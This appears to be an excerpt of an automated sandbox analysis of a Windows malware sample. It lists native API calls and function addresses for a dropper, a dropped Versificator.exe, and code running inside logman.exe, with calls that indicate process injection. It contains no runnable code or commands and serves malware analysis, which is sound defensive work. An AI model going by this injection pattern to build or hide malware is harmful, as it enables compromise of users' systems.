            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_21272DF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_21272C70
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212735C0 NtCreateMutant,LdrInitializeThunk,11_2_212735C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21274340 NtSetContextThread,11_2_21274340
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21274650 NtSuspendThread,11_2_21274650
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272B60 NtClose,11_2_21272B60
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272BA0 NtEnumerateValueKey,11_2_21272BA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272B80 NtQueryInformationFile,11_2_21272B80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272BE0 NtQueryValueKey,11_2_21272BE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272BF0 NtAllocateVirtualMemory,11_2_21272BF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272AB0 NtWaitForSingleObject,11_2_21272AB0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272AF0 NtWriteFile,11_2_21272AF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272AD0 NtReadFile,11_2_21272AD0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272D30 NtUnmapViewOfSection,11_2_21272D30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272D00 NtSetInformationFile,11_2_21272D00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272D10 NtMapViewOfSection,11_2_21272D10
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272DB0 NtEnumerateKey,11_2_21272DB0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272DD0 NtDelayExecution,11_2_21272DD0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272C00 NtQueryInformationProcess,11_2_21272C00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272C60 NtCreateKey,11_2_21272C60
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272CA0 NtQueryInformationToken,11_2_21272CA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272CF0 NtOpenProcess,11_2_21272CF0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272CC0 NtQueryVirtualMemory,11_2_21272CC0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272F30 NtCreateSection,11_2_21272F30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272F60 NtCreateProcessEx,11_2_21272F60
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272FA0 NtQuerySection,11_2_21272FA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272FB0 NtResumeThread,11_2_21272FB0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272F90 NtProtectVirtualMemory,11_2_21272F90
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272FE0 NtCreateFile,11_2_21272FE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272E30 NtWriteVirtualMemory,11_2_21272E30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272EA0 NtAdjustPrivilegesToken,11_2_21272EA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272E80 NtReadVirtualMemory,11_2_21272E80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21272EE0 NtQueueApcThread,11_2_21272EE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21273010 NtOpenDirectoryObject,11_2_21273010
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21273090 NtSetValueKey,11_2_21273090
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03114340 NtSetContextThread,LdrInitializeThunk,15_2_03114340
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03114650 NtSuspendThread,LdrInitializeThunk,15_2_03114650
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112B60 NtClose,LdrInitializeThunk,15_2_03112B60
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_03112BF0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112BE0 NtQueryValueKey,LdrInitializeThunk,15_2_03112BE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112AD0 NtReadFile,LdrInitializeThunk,15_2_03112AD0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112F30 NtCreateSection,LdrInitializeThunk,15_2_03112F30
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112FB0 NtResumeThread,LdrInitializeThunk,15_2_03112FB0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112FE0 NtCreateFile,LdrInitializeThunk,15_2_03112FE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_03112E80
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112EE0 NtQueueApcThread,LdrInitializeThunk,15_2_03112EE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112D10 NtMapViewOfSection,LdrInitializeThunk,15_2_03112D10
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_03112D30
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112DD0 NtDelayExecution,LdrInitializeThunk,15_2_03112DD0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_03112DF0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_03112C70
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112C60 NtCreateKey,LdrInitializeThunk,15_2_03112C60
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_03112CA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031135C0 NtCreateMutant,LdrInitializeThunk,15_2_031135C0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031139B0 NtGetContextThread,LdrInitializeThunk,15_2_031139B0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112B80 NtQueryInformationFile,15_2_03112B80
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112BA0 NtEnumerateValueKey,15_2_03112BA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112AB0 NtWaitForSingleObject,15_2_03112AB0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112AF0 NtWriteFile,15_2_03112AF0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112F60 NtCreateProcessEx,15_2_03112F60
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112F90 NtProtectVirtualMemory,15_2_03112F90
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112FA0 NtQuerySection,15_2_03112FA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112E30 NtWriteVirtualMemory,15_2_03112E30
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112EA0 NtAdjustPrivilegesToken,15_2_03112EA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112D00 NtSetInformationFile,15_2_03112D00
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112DB0 NtEnumerateKey,15_2_03112DB0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112C00 NtQueryInformationProcess,15_2_03112C00
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112CC0 NtQueryVirtualMemory,15_2_03112CC0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03112CF0 NtOpenProcess,15_2_03112CF0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03113010 NtOpenDirectoryObject,15_2_03113010
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03113090 NtSetValueKey,15_2_03113090
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03113D10 NtOpenProcessToken,15_2_03113D10
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03113D70 NtOpenThread,15_2_03113D70
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02769730 NtReadFile,15_2_02769730
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_027695D0 NtCreateFile,15_2_027695D0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02769A10 NtAllocateVirtualMemory,15_2_02769A10
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_027698C0 NtClose,15_2_027698C0
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
            Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_004049F90_2_004049F9
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_004064AE0_2_004064AE
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123010011_2_21230100
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DA11811_2_212DA118
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C815811_2_212C8158
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F41A211_2_212F41A2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213001AA11_2_213001AA
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F81CC11_2_212F81CC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212D200011_2_212D2000
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FA35211_2_212FA352
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124E3F011_2_2124E3F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_213003E611_2_213003E6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E027411_2_212E0274
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212C02C011_2_212C02C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124053511_2_21240535
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130059111_2_21300591
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E442011_2_212E4420
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F244611_2_212F2446
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EE4F611_2_212EE4F6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124077011_2_21240770
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126475011_2_21264750
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123C7C011_2_2123C7C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125C6E011_2_2125C6E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125696211_2_21256962
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212429A011_2_212429A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130A9A611_2_2130A9A6
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124A84011_2_2124A840
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124284011_2_21242840
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212268B811_2_212268B8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2126E8F011_2_2126E8F0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FAB4011_2_212FAB40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F6BD711_2_212F6BD7
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123EA8011_2_2123EA80
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124AD0011_2_2124AD00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DCD1F11_2_212DCD1F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21258DBF11_2_21258DBF
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123ADE011_2_2123ADE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240C0011_2_21240C00
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E0CB511_2_212E0CB5
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21230CF211_2_21230CF2
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21282F2811_2_21282F28
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21260F3011_2_21260F30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E2F3011_2_212E2F30
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212B4F4011_2_212B4F40
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212BEFA011_2_212BEFA0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124CFE011_2_2124CFE0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21232FC811_2_21232FC8
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FEE2611_2_212FEE26
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21240E5911_2_21240E59
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_21252E9011_2_21252E90
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FCE9311_2_212FCE93
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FEEDB11_2_212FEEDB
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2127516C11_2_2127516C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122F17211_2_2122F172
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2130B16B11_2_2130B16B
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2124B1B011_2_2124B1B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F70E911_2_212F70E9
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FF0E011_2_212FF0E0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212EF0CC11_2_212EF0CC
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212470C011_2_212470C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F132D11_2_212F132D
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2122D34C11_2_2122D34C
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2128739A11_2_2128739A
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212452A011_2_212452A0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212E12ED11_2_212E12ED
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2125B2C011_2_2125B2C0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212F757111_2_212F7571
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212DD5B011_2_212DD5B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FF43F11_2_212FF43F
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2123146011_2_21231460
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_212FF7B011_2_212FF7B0
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeCode function: 11_2_2128563011_2_21285630
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048D3D9414_2_048D3D94
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CB54414_2_048CB544
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CD56414_2_048CD564
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CB68814_2_048CB688
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CB69414_2_048CB694
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048EC18414_2_048EC184
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048D5BA414_2_048D5BA4
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CD33B14_2_048CD33B
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exeCode function: 14_2_048CD34414_2_048CD344
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319A35215_2_0319A352
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031A03E615_2_031A03E6
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030EE3F015_2_030EE3F0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0318027415_2_03180274
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031602C015_2_031602C0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030D010015_2_030D0100
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0317A11815_2_0317A118
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0316815815_2_03168158
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031A01AA15_2_031A01AA
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031981CC15_2_031981CC
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0310475015_2_03104750
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E077015_2_030E0770
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030DC7C015_2_030DC7C0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030FC6E015_2_030FC6E0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E053515_2_030E0535
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031A059115_2_031A0591
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319244615_2_03192446
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0318E4F615_2_0318E4F6
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319AB4015_2_0319AB40
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03196BD715_2_03196BD7
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030DEA8015_2_030DEA80
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030F696215_2_030F6962
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E29A015_2_030E29A0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031AA9A615_2_031AA9A6
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E284015_2_030E2840
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030EA84015_2_030EA840
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030C68B815_2_030C68B8
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0310E8F015_2_0310E8F0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03100F3015_2_03100F30
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03122F2815_2_03122F28
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03154F4015_2_03154F40
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0315EFA015_2_0315EFA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030D2FC815_2_030D2FC8
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030ECFE015_2_030ECFE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319EE2615_2_0319EE26
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E0E5915_2_030E0E59
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319CE9315_2_0319CE93
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030F2E9015_2_030F2E90
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319EEDB15_2_0319EEDB
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030EAD0015_2_030EAD00
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030F8DBF15_2_030F8DBF
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030DADE015_2_030DADE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E0C0015_2_030E0C00
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03180CB515_2_03180CB5
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030D0CF215_2_030D0CF2
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319132D15_2_0319132D
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030CD34C15_2_030CD34C
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0312739A15_2_0312739A
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E52A015_2_030E52A0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030FB2C015_2_030FB2C0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031812ED15_2_031812ED
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031AB16B15_2_031AB16B
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0311516C15_2_0311516C
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030CF17215_2_030CF172
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030EB1B015_2_030EB1B0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E70C015_2_030E70C0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0318F0CC15_2_0318F0CC
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031970E915_2_031970E9
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319F0E015_2_0319F0E0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319F7B015_2_0319F7B0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_031916CC15_2_031916CC
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319757115_2_03197571
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0317D5B015_2_0317D5B0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319F43F15_2_0319F43F
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030D146015_2_030D1460
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319FB7615_2_0319FB76
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030FFB8015_2_030FFB80
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03155BF015_2_03155BF0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0311DBF915_2_0311DBF9
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319FA4915_2_0319FA49
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03197A4615_2_03197A46
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03153A6C15_2_03153A6C
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03125AA015_2_03125AA0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0317DAAC15_2_0317DAAC
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0318DAC615_2_0318DAC6
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E995015_2_030E9950
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030FB95015_2_030FB950
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0314D80015_2_0314D800
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E38E015_2_030E38E0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319FF0915_2_0319FF09
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E1F9215_2_030E1F92
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319FFB115_2_0319FFB1
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A3FD215_2_030A3FD2
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030A3FD515_2_030A3FD5
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E9EB015_2_030E9EB0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03191D5A15_2_03191D5A
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030E3D4015_2_030E3D40
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03197D7315_2_03197D73
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_030FFDC015_2_030FFDC0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_03159C3215_2_03159C32
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0319FCF215_2_0319FCF2
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0275222015_2_02752220
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274D2B015_2_0274D2B0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274B29015_2_0274B290
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274B3E015_2_0274B3E0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274B3D415_2_0274B3D4
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274D09015_2_0274D090
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0274D08715_2_0274D087
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_02753AE015_2_02753AE0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_027558F015_2_027558F0
            Source: C:\Windows\SysWOW64\logman.exeCode function: 15_2_0276BED015_2_0276BED0
